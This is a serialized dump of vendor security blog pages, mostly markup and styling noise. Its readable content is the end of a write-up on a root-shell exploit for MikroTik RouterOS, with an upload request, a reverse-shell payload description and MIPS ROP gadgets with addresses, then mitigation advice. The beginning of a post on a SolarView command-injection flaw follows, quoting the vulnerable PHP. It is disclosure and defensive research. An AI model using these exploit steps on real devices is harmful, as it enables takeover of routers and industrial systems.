",[1373,92846,5417],{"class":1397},[1373,92848,5420],{"class":1383},[1373,92850,1388],{"class":1387},[1373,92852,85692],{"class":1391},[1373,92854,1388],{"class":1387},[1373,92856,4606],{"class":1383},[1373,92858,4641],{"class":1383},[1373,92860,9588],{"class":4640},[1373,92862,5437],{"class":1383},[1373,92864,57295],{"class":4640},[1373,92866,92867],{"class":1383},")}\n",[1373,92869,92870],{"class":1375,"line":4768},[1373,92871,6520],{"emptyLinePlaceholder":237},[1373,92873,92874,92877,92879,92882,92884,92886,92888,92890,92892,92894,92896,92898,92900,92902,92904,92906,92908,92910,92913,92915,92917,92920,92922,92925,92927,92930],{"class":1375,"line":4792},[1373,92875,92876],{"class":4640}," r ",[1373,92878,5417],{"class":1397},[1373,92880,92881],{"class":4640}," requests",[1373,92883,59],{"class":1383},[1373,92885,46577],{"class":11735},[1373,92887,1384],{"class":1383},[1373,92889,7585],{"class":19096},[1373,92891,8575],{"class":1397},[1373,92893,4883],{"class":1387},[1373,92895,87009],{"class":1391},[1373,92897,183],{"class":1387},[1373,92899,15478],{"class":1397},[1373,92901,92723],{"class":6761},[1373,92903,59],{"class":1383},[1373,92905,63614],{"class":63570},[1373,92907,15478],{"class":1397},[1373,92909,4883],{"class":1387},[1373,92911,92912],{"class":1391},"\u002Fjsproxy\u002Fupload?",[1373,92914,183],{"class":1387},[1373,92916,15478],{"class":1397},[1373,92918,92919],{"class":11735}," param",[1373,92921,5437],{"class":1383},[1373,92923,92924],{"class":19096}," files",[1373,92926,5417],{"class":1397},[1373,92928,92929],{"class":11735},"files",[1373,92931,11875],{"class":1383},[1373,92933,92934,92937,92939,92941,92944,92946,92948],{"class":1375,"line":4798},[1373,92935,92936],{"class":4636}," if",[1373,92938,19110],{"class":4640},[1373,92940,59],{"class":1383},[1373,92942,92943],{"class":63570},"status_code",[1373,92945,34516],{"class":1397},[1373,92947,6610],{"class":5467},[1373,92949,11747],{"class":1383},[1373,92951,92952,92954,92956,92958,92960,92962],{"class":1375,"line":4806},[1373,92953,63893],{"class":1379},[1373,92955,1384],{"class":1383},[1373,92957,11872],{"class":11735},[1373,92959,59],{"class":1383},[1373,92961,13389],{"class":63570},[1373,92963,11875],{"class":1383},[1373,92965,92966,92969,92972,92974,92977,92980,92982,92984,92986,92988,92990,92992],{"class":1375,"line":4817},[1373,92967,92968],{"class":4636}," raise",[1373,92970,92971],{"class":9165}," ValueError",[1373,92973,1384],{"class":1383},[1373,92975,92976],{"class":7293},"f",[1373,92978,92979],{"class":1391},"'Status code: ",[1373,92981,9149],{"class":5467},[1373,92983,11872],{"class":11735},[1373,92985,59],{"class":1383},[1373,92987,92943],{"class":63570},[1373,92989,28575],{"class":5467},[1373,92991,1388],{"class":1391},[1373,92993,11875],{"class":1383},[18,92995,92996,92997,93000],{},"The bind shell issue is also trivial. We simply changed “stage2” to send out a single reverse shell (see the C code above). This has the added benefit of cleanly exiting when the attacker is done with the reverse shell, which allows ",[886,92998,92999],{},"www"," to respawn (and prevents an autosupout.rif from being generated).",[61,93002,93004],{"id":93003},"finding-a-mips-rop-chain","Finding a MIPS ROP Chain",[18,93006,93007],{},"Now with a simplified approach, the individual MIPS gadgets become easy to find. The ROP chain is generally reduced to:",[1789,93009,93010,93017,93023],{},[25,93011,93012,93013,93016],{},"Move ",[886,93014,93015],{},"$sp"," to attacker controlled data.",[25,93018,93019,93020,59],{},"Move an attacker controlled filename to ",[886,93021,93022],{},"$a0",[25,93024,93025,93026,59],{},"Call ",[886,93027,92475],{},[18,93029,93030,93031,1246,93033,1255,93036,93039,93040,93042,93043,4606],{},"The gadgets can be reliably found in three functions for all the versions of RouterOS we tested (6.40 up to 6.49.6): ",[886,93032,46531],{},[886,93034,93035],{},"www::Server::get",[886,93037,93038],{},"loadServlet",". First, to move ",[886,93041,93015],{}," to the attacker controlled data, we can use the epilogue of ",[886,93044,46531],{},[1354,93046,93050],{"className":93047,"code":93048,"language":93049,"meta":219,"style":219},"language-asm shiki shiki-themes material-theme-lighter github-light github-dark monokai","0x0040acbc \u003C+728>: lw ra,1540(sp)\n0x0040acc0 \u003C+732>: lw s1,1536(sp)\n0x0040acc4 \u003C+736>: lw s0,1532(sp)\n0x0040acc8 \u003C+740>: move v0,zero\n0x0040accc \u003C+744>: jr ra\n0x0040acd0 \u003C+748>: addiu sp,sp,1544\n","asm",[886,93051,93052,93057,93062,93067,93072,93077],{"__ignoreMap":219},[1373,93053,93054],{"class":1375,"line":1376},[1373,93055,93056],{},"0x0040acbc \u003C+728>: lw ra,1540(sp)\n",[1373,93058,93059],{"class":1375,"line":220},[1373,93060,93061],{},"0x0040acc0 \u003C+732>: lw s1,1536(sp)\n",[1373,93063,93064],{"class":1375,"line":1266},[1373,93065,93066],{},"0x0040acc4 \u003C+736>: lw s0,1532(sp)\n",[1373,93068,93069],{"class":1375,"line":1852},[1373,93070,93071],{},"0x0040acc8 \u003C+740>: move v0,zero\n",[1373,93073,93074],{"class":1375,"line":4692},[1373,93075,93076],{},"0x0040accc \u003C+744>: jr ra\n",[1373,93078,93079],{"class":1375,"line":4724},[1373,93080,93081],{},"0x0040acd0 \u003C+748>: addiu sp,sp,1544\n",[18,93083,93084,93085,4606],{},"Then to move an attacker controlled string into $a0 we use the epilogue of ",[886,93086,93035],{},[1354,93088,93090],{"className":93047,"code":93089,"language":93049,"meta":219,"style":219},"0x0040c514 \u003C+620>: addiu a0,sp,44\n0x0040c518 \u003C+624>: lw ra,76(sp)\n0x0040c51c \u003C+628>: move v0,s1\n0x0040c520 \u003C+632>: lw s4,72(sp)\n0x0040c524 \u003C+636>: lw s3,68(sp)\n0x0040c528 \u003C+640>: lw s2,64(sp)\n0x0040c52c \u003C+644>: lw s1,60(sp)\n0x0040c530 \u003C+648>: lw s0,56(sp)\n0x0040c534 \u003C+652>: jr ra\n0x0040c538 \u003C+656>: addiu sp,sp,80\n",[886,93091,93092,93097,93102,93107,93112,93117,93122,93127,93132,93137],{"__ignoreMap":219},[1373,93093,93094],{"class":1375,"line":1376},[1373,93095,93096],{},"0x0040c514 \u003C+620>: addiu a0,sp,44\n",[1373,93098,93099],{"class":1375,"line":220},[1373,93100,93101],{},"0x0040c518 \u003C+624>: lw ra,76(sp)\n",[1373,93103,93104],{"class":1375,"line":1266},[1373,93105,93106],{},"0x0040c51c \u003C+628>: move v0,s1\n",[1373,93108,93109],{"class":1375,"line":1852},[1373,93110,93111],{},"0x0040c520 \u003C+632>: lw s4,72(sp)\n",[1373,93113,93114],{"class":1375,"line":4692},[1373,93115,93116],{},"0x0040c524 \u003C+636>: lw s3,68(sp)\n",[1373,93118,93119],{"class":1375,"line":4724},[1373,93120,93121],{},"0x0040c528 \u003C+640>: lw s2,64(sp)\n",[1373,93123,93124],{"class":1375,"line":4756},[1373,93125,93126],{},"0x0040c52c \u003C+644>: lw s1,60(sp)\n",[1373,93128,93129],{"class":1375,"line":4768},[1373,93130,93131],{},"0x0040c530 \u003C+648>: lw s0,56(sp)\n",[1373,93133,93134],{"class":1375,"line":4792},[1373,93135,93136],{},"0x0040c534 \u003C+652>: jr ra\n",[1373,93138,93139],{"class":1375,"line":4798},[1373,93140,93141],{},"0x0040c538 \u003C+656>: addiu sp,sp,80\n",[18,93143,93144,93145,93147,93148,93150],{},"Finally, to call into ",[886,93146,92475],{},", we opted to use a call via ",[886,93149,93038],{}," instead of calling it directly.",[1354,93152,93154],{"className":93047,"code":93153,"language":93049,"meta":219,"style":219},"0x00412480 \u003C+344>: jal 0x4084a0 \u003Cdlopen@plt>\n0x00412484 \u003C+348>: addiu a0,a0,4\n",[886,93155,93156,93161],{"__ignoreMap":219},[1373,93157,93158],{"class":1375,"line":1376},[1373,93159,93160],{},"0x00412480 \u003C+344>: jal 0x4084a0 \u003Cdlopen@plt>\n",[1373,93162,93163],{"class":1375,"line":220},[1373,93164,93165],{},"0x00412484 \u003C+348>: addiu a0,a0,4\n",[18,93167,93168],{},"Combined, they create a fairly simple ROP chain that results in loading the malicious shared object and sending a reverse shell to the attacker.",[61,93170,93172],{"id":93171},"detection-and-prevention","Detection and Prevention",[18,93174,93175],{},"As we’ve seen, exploitation of CVE-2023-30799 on hardware turned out to be quite easy. Given RouterOS’ long history of being an APT target, combined with the fact that FOISted was released well over a year ago, we have to assume we aren’t the first group to figure this out.",[18,93177,93178,93179,93183],{},"Under normal circumstances, we’d say detection of exploitation is a good first step to protecting your systems. Unfortunately, detection is nearly impossible. The RouterOS web and Winbox interfaces implement custom encryption schemes that neither Snort or Suricata can decrypt and inspect. Once an attacker is established on the device, they can easily make themselves invisible to the RouterOS UI. Microsoft ",[47,93180,22232],{"href":93181,"rel":93182},"https:\u002F\u002Fgithub.com\u002Fmicrosoft\u002Frouteros-scanner",[51]," a toolset that identifies potential malicious configuration changes, but configuration changes aren’t necessary when the attacker has root access to the system.",[18,93185,93186],{},"The best time to catch the attacker is during brute force attempts (if that approach is used) or when malicious ELF binaries are uploaded to the device. Although neither of those are specific to CVE-2023-30799.",[18,93188,93189],{},"Prevention is the best course of action. There are a few things administrators can do to protect themselves:",[1789,93191,93192,93195,93202,93205],{},[25,93193,93194],{},"Remove MikroTik administrative interfaces from the internet.",[25,93196,93197,93201],{},[47,93198,93200],{"href":93199},"%E2%80%8B%E2%80%8Bhttps:\u002F\u002Fwiki.mikrotik.com\u002Fwiki\u002FManual:Securing_Your_Router#Access_by_IP_address","Restrict"," which IP addresses administrators can login from.",[25,93203,93204],{},"Disable the Winbox and the web interfaces. Only use SSH for administration.",[25,93206,93207,93208,93213],{},"Configure SSH to use ",[47,93209,93212],{"href":93210,"rel":93211},"https:\u002F\u002Fwiki.mikrotik.com\u002Fwiki\u002FUse_SSH_to_execute_commands_(public\u002Fprivate_key_login)",[51],"public\u002Fprivate keys"," and disable passwords.",[18,93215,93216],{},"Otherwise, administrators should upgrade to 6.49.8 (stable) or the most recent 7.x stable.",[61,93218,202],{"id":201},[18,93220,93221,93222,93225,93226,93229,93230,93235],{},"VulnCheck’s interest in CVE-2023-30799 was the result of cross-team activities. Our ",[47,93223,42306],{"href":214,"rel":93224},[51]," team flagged the FOISted exploit, our ",[47,93227,91940],{"href":45535,"rel":93228},[51]," team wrote a new exploit, and our ",[47,93231,93234],{"href":93232,"rel":93233},"https:\u002F\u002Fvulncheck.com\u002Fadvisories\u002Freport",[51],"CNA team"," issued the CVE.",[18,93237,93238,93239,93243,93244,59],{},"If you are aware of an exploit that lacks an associated CVE, please ",[47,93240,93242],{"href":93232,"rel":93241},[51],"contact"," our CNA team to get a CVE assigned. We also encourage you to submit public exploits hosted on GitHub to ",[47,93245,83700],{"href":74248,"rel":93246},[51],[18,93248,93249],{},"If you are as interested in exploits as we are, register for a VulnCheck account today by clicking “Sign in \u002FRegister” and schedule a demo.",[2901,93251,93252],{},"html .light .shiki span {color: var(--shiki-light);background: var(--shiki-light-bg);font-style: var(--shiki-light-font-style);font-weight: var(--shiki-light-font-weight);text-decoration: var(--shiki-light-text-decoration);}html.light .shiki span {color: var(--shiki-light);background: var(--shiki-light-bg);font-style: var(--shiki-light-font-style);font-weight: var(--shiki-light-font-weight);text-decoration: var(--shiki-light-text-decoration);}html .default .shiki span {color: var(--shiki-default);background: var(--shiki-default-bg);font-style: var(--shiki-default-font-style);font-weight: var(--shiki-default-font-weight);text-decoration: var(--shiki-default-text-decoration);}html .shiki span {color: var(--shiki-default);background: var(--shiki-default-bg);font-style: var(--shiki-default-font-style);font-weight: var(--shiki-default-font-weight);text-decoration: var(--shiki-default-text-decoration);}html .dark .shiki span {color: var(--shiki-dark);background: var(--shiki-dark-bg);font-style: var(--shiki-dark-font-style);font-weight: var(--shiki-dark-font-weight);text-decoration: var(--shiki-dark-text-decoration);}html.dark .shiki span {color: var(--shiki-dark);background: var(--shiki-dark-bg);font-style: var(--shiki-dark-font-style);font-weight: var(--shiki-dark-font-weight);text-decoration: var(--shiki-dark-text-decoration);}html .sepia .shiki span {color: var(--shiki-sepia);background: var(--shiki-sepia-bg);font-style: var(--shiki-sepia-font-style);font-weight: var(--shiki-sepia-font-weight);text-decoration: var(--shiki-sepia-text-decoration);}html.sepia .shiki span {color: var(--shiki-sepia);background: var(--shiki-sepia-bg);font-style: var(--shiki-sepia-font-style);font-weight: var(--shiki-sepia-font-weight);text-decoration: var(--shiki-sepia-text-decoration);}html pre.shiki code .srJo8, html code.shiki .srJo8{--shiki-light:#9C3EDA;--shiki-light-font-style:inherit;--shiki-default:#D73A49;--shiki-default-font-style:inherit;--shiki-dark:#F97583;--shiki-dark-font-style:inherit;--shiki-sepia:#66D9EF;--shiki-sepia-font-style:italic}html pre.shiki code .sD0ED, html code.shiki .sD0ED{--shiki-light:#6182B8;--shiki-default:#6F42C1;--shiki-dark:#B392F0;--shiki-sepia:#A6E22E}html pre.shiki code .swvn1, html code.shiki .swvn1{--shiki-light:#39ADB5;--shiki-default:#24292E;--shiki-dark:#E1E4E8;--shiki-sepia:#F8F8F2}html pre.shiki code .sDdYn, html code.shiki .sDdYn{--shiki-light:#E53935;--shiki-light-font-style:italic;--shiki-default:#24292E;--shiki-default-font-style:inherit;--shiki-dark:#E1E4E8;--shiki-dark-font-style:inherit;--shiki-sepia:#FD971F;--shiki-sepia-font-style:italic}html pre.shiki code .sW6vx, html code.shiki .sW6vx{--shiki-light:#90A4AE;--shiki-light-font-style:italic;--shiki-default:#24292E;--shiki-default-font-style:inherit;--shiki-dark:#E1E4E8;--shiki-dark-font-style:inherit;--shiki-sepia:#FD971F;--shiki-sepia-font-style:italic}html pre.shiki code .s_MOj, html code.shiki .s_MOj{--shiki-light:#E2931D;--shiki-light-font-style:inherit;--shiki-default:#005CC5;--shiki-default-font-style:inherit;--shiki-dark:#79B8FF;--shiki-dark-font-style:inherit;--shiki-sepia:#66D9EF;--shiki-sepia-font-style:italic}html pre.shiki code .ss--_, html code.shiki .ss--_{--shiki-light:#90A4AE;--shiki-default:#24292E;--shiki-dark:#E1E4E8;--shiki-sepia:#F8F8F2}html pre.shiki code .sGXK2, html code.shiki .sGXK2{--shiki-light:#39ADB5;--shiki-default:#D73A49;--shiki-dark:#F97583;--shiki-sepia:#F92672}html pre.shiki code .sSsL9, html code.shiki .sSsL9{--shiki-light:#90A4AE;--shiki-default:#005CC5;--shiki-dark:#79B8FF;--shiki-sepia:#FD971F}html pre.shiki code .squCx, html code.shiki .squCx{--shiki-light:#E53935;--shiki-default:#24292E;--shiki-dark:#E1E4E8;--shiki-sepia:#F8F8F2}html pre.shiki code .sAZ-3, html code.shiki .sAZ-3{--shiki-light:#6182B8;--shiki-default:#24292E;--shiki-dark:#E1E4E8;--shiki-sepia:#F8F8F2}html pre.shiki code .siCPE, html code.shiki .siCPE{--shiki-light:#39ADB5;--shiki-default:#032F62;--shiki-dark:#9ECBFF;--shiki-sepia:#E6DB74}html pre.shiki code .sQeA1, html code.shiki .sQeA1{--shiki-light:#90A4AE;--shiki-default:#005CC5;--shiki-dark:#79B8FF;--shiki-sepia:#AE81FF}html pre.shiki code .sYThS, html code.shiki .sYThS{--shiki-light:#F76D47;--shiki-default:#005CC5;--shiki-dark:#79B8FF;--shiki-sepia:#AE81FF}html pre.shiki code .sLACW, html code.shiki .sLACW{--shiki-light:#91B859;--shiki-default:#032F62;--shiki-dark:#9ECBFF;--shiki-sepia:#E6DB74}html pre.shiki code .sQgqH, html code.shiki .sQgqH{--shiki-light:#90A4AE;--shiki-light-font-style:italic;--shiki-default:#E36209;--shiki-default-font-style:inherit;--shiki-dark:#FFAB70;--shiki-dark-font-style:inherit;--shiki-sepia:#FD971F;--shiki-sepia-font-style:italic}html pre.shiki code .sRxSC, html code.shiki .sRxSC{--shiki-light:#39ADB5;--shiki-light-font-style:italic;--shiki-default:#D73A49;--shiki-default-font-style:inherit;--shiki-dark:#F97583;--shiki-dark-font-style:inherit;--shiki-sepia:#F92672;--shiki-sepia-font-style:inherit}html pre.shiki code .sMLJd, html code.shiki .sMLJd{--shiki-light:#6182B8;--shiki-default:#005CC5;--shiki-dark:#79B8FF;--shiki-sepia:#66D9EF}",{"title":219,"searchDepth":220,"depth":220,"links":93254},[93255,93256,93257,93258,93259,93260],{"id":92301,"depth":220,"text":92302},{"id":92394,"depth":220,"text":92395},{"id":92419,"depth":220,"text":92420},{"id":93003,"depth":220,"text":93004},{"id":93171,"depth":220,"text":93172},{"id":201,"depth":220,"text":202},"VulnCheck develops an exploit that gets a root shell on MikroTik RouterOS.",{"slug":93263},"mikrotik-foisted-revisited","\u002Fblog\u002Fmikrotik-foisted-revisited",{"title":83451,"description":93261},"blog\u002Fmikrotik-foisted-revisited",[242],"yAEx4IWjBwlZkdOF8VY3HW0RDQSt4iNnKc1JKtIgnTY",{"id":93270,"title":93271,"articles":93272,"authors":93373,"body":93375,"date":93276,"description":95214,"extension":234,"image":7,"link":7,"meta":95215,"navigation":237,"path":95217,"seo":95218,"series":7,"stem":95219,"subtype":7,"tags":95220,"__hash__":95221},"blog\u002Fblog\u002Fsolarview-exploitation.md","Actively Exploited Industrial Control Systems Hardware - SolarView Series - Blog - VulnCheck",[93273,93277,93280,93283,93286,93290,93294,93297,93300,93304,93308,93311,93314,93318,93321,93324,93329,93333,93336,93339,93343,93346,93349,93353,93357,93361,93365,93369],{"title":93274,"source":85794,"link":93275,"date":93276},"Actively exploited vulnerability threatens hundreds of solar power stations","https:\u002F\u002Farstechnica.com\u002Fsecurity\u002F2023\u002F07\u002Factively-exploited-vulnerability-threatens-hundreds-of-solar-power-stations\u002F","2023-07-05",{"title":93278,"source":11218,"link":93279,"date":93276},"3 Critical RCE Bugs Threaten Industrial Solar Panels, Endangering Grid Systems","https:\u002F\u002Fwww.darkreading.com\u002Fics-ot\u002F3-critical-rce-bugs-threaten-industrial-solar-panels",{"title":93281,"source":12153,"link":93282,"date":93276},"Two-thirds of internet-facing SolarView systems still vulnerable to critical bug","https:\u002F\u002Fwww.scmagazine.com\u002Fnews\u002Fvulnerability-management\u002Fsolarview-systems-vulnerable-critical-bug",{"title":93284,"source":14378,"link":93285,"date":93276},"Exploited Solar Power Product Vulnerability Could Expose Energy Organizations to Attacks","https:\u002F\u002Fwww.securityweek.com\u002Fexploited-solar-power-product-vulnerability-could-expose-energy-organizations-to-attacks\u002F",{"title":93287,"source":14373,"link":93288,"date":93289},"Over 130,000 solar energy monitoring systems exposed online","https:\u002F\u002Fwww.bleepingcomputer.com\u002Fnews\u002Fsecurity\u002Fover-130-000-solar-energy-monitoring-systems-exposed-online\u002F","2023-07-06",{"title":93291,"source":93292,"link":93293,"date":93289},"SolarView flaw exposes hundreds of solar farms","Cyber News","https:\u002F\u002Fcybernews.com\u002Fnews\u002Fsolarview-flaw-exposes-solar-farms\u002F",{"title":93295,"source":60946,"link":93296,"date":93289},"Photovoltaik-Monitoring: Sicherheitslücken in Solarview werden angegriffen","https:\u002F\u002Fwww.heise.de\u002Fnews\u002FPhotovoltaik-Monitoring-Sicherheitsluecken-in-Solarview-werden-angegriffen-9208511.html",{"title":93298,"source":19484,"link":93299,"date":93289},"Unpatched SolarView Systems Vulnerable to Exploits","https:\u002F\u002Fwww.infosecurity-magazine.com\u002Fnews\u002Fsolarview-systems-vulnerable\u002F",{"title":93301,"source":93302,"link":93303,"date":93289},"Solar panel stations could fall prey to this devious security hack","MSN (TechRadar syndication)","https:\u002F\u002Fwww.msn.com\u002Fen-us\u002Fnews\u002Ftechnology\u002Fsolar-panel-stations-could-fall-prey-to-this-devious-security-hack\u002Far-AA1dweec?ocid=Peregrine",{"title":93305,"source":93306,"link":93307,"date":93289},"Threat actors quick to exploit proof-of-concept code","SC Media DailyScan newsletter","https:\u002F\u002Fpages.scmagazine.com\u002Findex.php\u002Femail\u002FemailWebview?md_id=14311",{"title":93309,"source":14390,"link":93310,"date":93289},"CVE-2022-29303 flaw in SolarView product can be exploited in attacks against the energy sector","https:\u002F\u002Fsecurityaffairs.com\u002F148216\u002Fhacking\u002Fsolarview-flaws-energy-sector.html",{"title":93301,"source":93312,"link":93313,"date":93289},"Tech Radar","https:\u002F\u002Fwww.techradar.com\u002Fpro\u002Fsolar-panel-stations-could-fall-prey-to-this-devious-security-hack",{"title":93315,"source":93316,"link":93317,"date":93289},"Hundreds of Solar Panels at Risk of Getting Hacked","Tech Times","https:\u002F\u002Fwww.techtimes.com\u002Farticles\u002F293514\u002F20230706\u002Fhundreds-solar-panels-risk-getting-hacked.htm",{"title":93319,"source":39566,"link":93320,"date":93289},"Nagoya port recovers from LockBit 3.0. Charming Kitten sighting. Spyware in Play store apps. Solar panel vulnerabilities.","https:\u002F\u002Fthecyberwire.com\u002Fnewsletters\u002Fdaily-briefing\u002F12\u002F127",{"title":93301,"source":93322,"link":93323,"date":93289},"Yahoo (TechRadar syndication)","https:\u002F\u002Fwww.yahoo.com\u002Flifestyle\u002Fsolar-panel-stations-could-fall-141006706.html",{"title":93325,"source":93326,"link":93327,"date":93328},"Cyber Security Headlines: Shell MOVEit breach, Pepsi bottler breach, INTERPOL nabs OPERA1ER","CISO Series, Cyber Security Headlines Podcast","https:\u002F\u002Fcisoseries.com\u002Fcyber-security-headlines-shell-moveit-breach-pepsi-bottler-breach-interpol-nabs-opera1er\u002F","2023-07-07",{"title":93330,"source":93331,"link":93332,"date":93328},"Hundreds of Solar Power Stations Are Running Software With Gaping Security Holes","ExtremeTech","https:\u002F\u002Fwww.extremetech.com\u002Finternet\u002Fhundreds-of-solar-power-stations-are-running-software-with-gaping-security",{"title":93334,"source":25672,"link":93335,"date":93328},"Critical RCE Bugs Expose Hundreds of Solar Power Stations","https:\u002F\u002Fgbhackers.com\u002Frce-bugs-solar-power-stations\u002F",{"title":93337,"source":12149,"link":93338,"date":93328},"VulnCheck detects remote command injection vulnerability in Contec SolarView series, affecting ICS hardware","https:\u002F\u002Findustrialcyber.co\u002Fvulnerabilities\u002Fvulncheck-detects-remote-command-injection-vulnerability-in-contec-solarview-series-affecting-ics-hardware\u002F",{"title":93340,"source":93341,"link":93342,"date":93328},"Security flaw threatens hundreds of solar power stations","MyBroadband","https:\u002F\u002Fmybroadband.co.za\u002Fnews\u002Fsecurity\u002F499153-security-flaw-threatens-hundreds-of-solar-power-stations.html",{"title":93344,"source":3494,"link":93345,"date":93328},"Risky Biz News: US and Canada warn of new Truebot malware variant","https:\u002F\u002Friskybiznews.substack.com\u002Fp\u002Frisky-biz-news-us-and-canada-warn?utm_source=post-email-title&publication_id=852612&post_id=133508363&isFreemail=true&utm_medium=email",{"title":93347,"source":23286,"link":93348,"date":93328},"Contec SolarView: Critical Bug Unpatched After 14 MONTHS","https:\u002F\u002Fsecurityboulevard.com\u002F2023\u002F07\u002Fcontec-solarview-unpatched-richixbw\u002F",{"title":93350,"source":93351,"link":93352,"date":93328},"Critical security vulnerabilities expose SolarView monitoring system on the open Internet","TechSpot","https:\u002F\u002Fwww.techspot.com\u002Fnews\u002F99306-critical-security-vulnerabilities-expose-solarview-monitoring-system-open.html",{"title":93354,"source":3481,"link":93355,"date":93356},"Liberté,Égalité, Spyware: France okays cops snooping on phones","https:\u002F\u002Fwww.theregister.com\u002F2023\u002F07\u002F10\u002Fin_brief_security\u002F","2023-07-10",{"title":93358,"source":92157,"link":93359,"date":93360},"IT’S ALIVE!, SLOW MIGRATIONS, HIDING ON THE NET, BLACKLOTUS SOURCE, & GASLIGHTING – PSW #790","https:\u002F\u002Fwww.scmagazine.com\u002Fpodcast-segment\u002Fits-alive-slow-migrations-hiding-on-the-net-blacklotus-source-gaslighting-psw-790","2023-07-12",{"title":93362,"source":93363,"link":93364,"date":93360},"The IT\u002FOT cultural divide in the federal space.","The CyberWire's Control Loop OT Cybersecurity Briefing podcast","https:\u002F\u002Fthecyberwire.com\u002Fpodcasts\u002Fcontrol-loop\u002F29\u002Fnotes",{"title":93366,"source":14373,"link":93367,"date":93368},"Fake Linux vulnerability exploit drops data-stealing malware","https:\u002F\u002Fwww.bleepingcomputer.com\u002Fnews\u002Fsecurity\u002Ffake-linux-vulnerability-exploit-drops-data-stealing-malware\u002F","2023-07-13",{"title":93370,"source":39566,"link":93371,"date":93372},"ControlLogix RCE exploit. Japan’s largest port disrupted by ransomware. Cl0p breaches Schneider Electric and Siemens Energy. Solar panel vulnerabilities.","https:\u002F\u002Fthecyberwire.com\u002Fnewsletters\u002Fcontrol-loop\u002F2\u002F8","2023-08-02",[93374],{"name":10391,"avatar":10392,"link":10393,"linkName":10394},{"type":15,"value":93376,"toc":95212},[93377,93388,93407,93427,93430,93436,93439,93452,93796,93810,94136,94139,94145,94148,94169,94175,94178,94199,94205,94216,94675,94700,95146,95154,95163,95169,95172,95174,95186,95195,95198,95202,95209],[18,93378,93379,93380,93387],{},"On June 22, 2023, Palo Alto Networks Unit 42 published ",[1131,93381,93382],{},[47,93383,93386],{"href":93384,"rel":93385},"https:\u002F\u002Funit42.paloaltonetworks.com\u002Fmirai-variant-targets-iot-exploits\u002F",[51],"IoT Under Siege: The Anatomy of the Latest Mirai Campaign Leveraging Multiple IoT Exploits",". The blog discusses a Mirai botnet variant using a handful of \"new\" CVEs to propagate.",[18,93389,93390,93391,93396,93397,93402,93403,93406],{},"One of the vulnerabilities was ",[47,93392,93395],{"href":93393,"rel":93394},"https:\u002F\u002Fnvd.nist.gov\u002Fvuln\u002Fdetail\u002FCVE-2022-29303",[51],"CVE-2022-29303",". CVE-2022-29303 is an unauthenticated and remote command injection vulnerability affecting the ",[47,93398,93401],{"href":93399,"rel":93400},"https:\u002F\u002Fwww.contec.com\u002Fproducts-services\u002Fenvironmental-monitoring\u002Fsolarview\u002F",[51],"Contec SolarView Series",". Since VulnCheck ",[47,93404,42306],{"href":214,"rel":93405},[51]," has indexed a number of public exploits for SolarView, we decided to dig in and examine the potential scale and impact of this exploitation in the wild.",[18,93408,93409,93410,93415,93416,982,93421,93426],{},"To understand the potential impact, we first need to know what Contec SolarView is. SolarView monitors and visualizes small to medium-scale solar power generation and storage. Contec’s website ",[47,93411,93414],{"href":93412,"rel":93413},"https:\u002F\u002Fwww.contec.com\u002Fsolutions\u002Fenergy\u002F",[51],"advertises"," that the “SolarView brand … has been introduced at more than 30,000 power stations.” It also highlights deployment scenarios for ",[47,93417,93420],{"href":93418,"rel":93419},"https:\u002F\u002Fwww.contec.com\u002Fsolutions\u002Fenergy\u002Fsolutions\u002Fsolar-power\u002F",[51],"SolarView Air",[47,93422,93425],{"href":93423,"rel":93424},"https:\u002F\u002Fwww.contec.com\u002Fsolutions\u002Fenergy\u002Fsolutions\u002Fsolar-battery\u002F",[51],"SolarView Battery"," that depict the hardware being used in commercial buildings and solar power plants. Contec SolarView is clearly intended for ICS networks, so you’d hope to never find one accessible over the internet.",[18,93428,93429],{},"Shodan currently indexes more than 600 SolarView systems.",[18,93431,93432],{},[68,93433],{":width":10862,"alt":93434,"src":93435},"SolarView instances on Shodan","\u002Fblog\u002Fsolarview-exploitation\u002Fsolarview-shodan.png",[18,93437,93438],{},"Palo Alto Networks’ recent blog touches on the Mirai-variant abusing CVE-2022-29303. According to the CVE description, the affected versions of SolarView are “ver.6.00”. Version 6.00 was released in 2019, and SolarView Compact has seen four firmware releases since then (6.20 in 2019, 7.00 in 2021, 8.00 in 2022, and 8.10 in 2023). That suggests that only a small subset of internet-facing hosts are likely to be vulnerable. However, further examination of SolarView’s firmware revealed that this CVE description is inaccurate.",[18,93440,93441,93442,93445,93446,93448,93449,93451],{},"CVE-2022-29303 affects the web server’s ",[886,93443,93444],{},"conf_mail.php"," endpoint, but version 6.20 (the version following the reportedly vulnerable 6.00) didn’t implement a fix for the issue. Not only was version 6.00 affected, but 6.20 as well. In fact, we found that the very straight-forward command injection in ",[886,93447,93444],{}," has existed since ",[1131,93450,54978],{}," version 4.00:",[1354,93453,93455],{"className":1367,"code":93454,"language":1369,"meta":219,"style":219},"if( isset($_REQUEST['button']) ){\n $button = $_REQUEST['button'];\n $mail_address = $_REQUEST['mail_address'];\n}\ninclude(\"include\u002FShowMsg.func\");\ninclude(\"include\u002Fcommon.def\");\n$TestMailLog = \"\u002Fvar\u002Flog\u002FSMail_test.log\";\n$CONFFILE = $ConfDataDir.\"\u002Ffws_mail.conf\";\n\nif( $button == $LABEL_SENDEXEC ){\n $mail_address = str_replace( \" \",\"\", $mail_address );\n if( strlen($mail_address) > 3 ){\n $sendmes = \"SolarView\";\n $exec_cmd = \"echo -1 \".$mail_address.\" TEST-MAIL '$sendmes' > \u002Fdev\u002Felogparam\";\n system( $exec_cmd );\n $status = 2;\n }\n else{\n $status = 3;\n }\n}\n",[886,93456,93457,93485,93508,93532,93536,93552,93567,93585,93610,93614,93633,93661,93682,93700,93741,93754,93766,93770,93776,93788,93792],{"__ignoreMap":219},[1373,93458,93459,93461,93463,93466,93468,93471,93473,93475,93478,93480,93482],{"class":1375,"line":1376},[1373,93460,4637],{"class":4636},[1373,93462,1384],{"class":1383},[1373,93464,93465],{"class":1379}," isset",[1373,93467,34467],{"class":1383},[1373,93469,93470],{"class":4640},"_REQUEST",[1373,93472,7035],{"class":1383},[1373,93474,1388],{"class":1387},[1373,93476,93477],{"class":1391},"button",[1373,93479,1388],{"class":1387},[1373,93481,48026],{"class":1383},[1373,93483,93484],{"class":1383}," ){\n",[1373,93486,93487,93489,93492,93494,93496,93498,93500,93502,93504,93506],{"class":1375,"line":220},[1373,93488,4656],{"class":1383},[1373,93490,93491],{"class":4640},"button 